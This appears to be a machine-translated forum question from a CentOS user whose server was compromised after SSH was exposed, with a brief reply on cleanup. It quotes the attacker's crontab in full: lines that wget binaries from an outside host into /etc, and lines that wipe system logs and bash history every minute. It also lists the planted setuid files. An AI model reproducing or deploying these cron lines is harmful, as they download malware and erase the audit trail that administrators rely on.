我相信我的CentOS中有人/病毒入侵,我最近打開SSH一天。盒子在局域網中。當我在外面時,我只需要使用它一段時間。CentOS被黑客入侵,crontab已被修改
那天晚上,linux在局域網中通過SSH訪問變得緩慢,並且打開任何本地網頁的速度很慢。這表現很奇怪。我檢查有時非常高的CPU。所以我檢查了crontab。它已經改變。
有一堆這樣的東西:
20 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd
*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd
*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx
*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir atdd
*/360 * * * * cd /etc;rm -rf dir ksapd
*/360 * * * * cd /etc;rm -rf dir kysapd
*/360 * * * * cd /etc;rm -rf dir skysapd
*/360 * * * * cd /etc;rm -rf dir sksapd
*/360 * * * * cd /etc;rm -rf dir xfsdx
*/1 * * * * cd /etc;rm -rf dir cupsdd.*
*/1 * * * * cd /etc;rm -rf dir atdd.*
*/1 * * * * cd /etc;rm -rf dir ksapd.*
*/1 * * * * cd /etc;rm -rf dir kysapd.*
*/1 * * * * cd /etc;rm -rf dir skysapd.*
*/1 * * * * cd /etc;rm -rf dir sksapd.*
*/1 * * * * cd /etc;rm -rf dir xfsdx.*
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
我可以看到我的/ etc /文件夾現在有這樣
srwsrwt 1 root root 1524643 Jan 31 21:06 atdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 atddd
srwsrwt 1 root root 1258750 Nov 24 14:22 cupsdd
-rwsrwsrwt 1 root root 1258750 Nov 24 14:22 cupsddd
srwsrwt 1 root root 1524643 Jan 31 21:06 ksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 ksapdd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:06 kysapdd
srwsrwt 1 root root 1524643 Jan 10 20:06 sksapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 sksapdd
-rwsrwsrwt 1 root root 1524643 Oct 24 04:55 skysapd
-rwsrwsrwt 1 root root 1524643 Jan 31 21:07 skysapdd
srwsrwt 1 root root 1524643 Feb 5 17:26 xfsdx
-rwsrwsrwt 1 root root 1524643 Feb 5 17:26 xfsdxd
發生了什麼事在紅色多個文件夾?我能做什麼?
刪除所有這些線路上的crontab,請檢查您的日誌(/無功/日誌/例如messages'),也可以使用'last'地看到,過去的連接。以防萬一,更改您的root密碼。 – fedorqui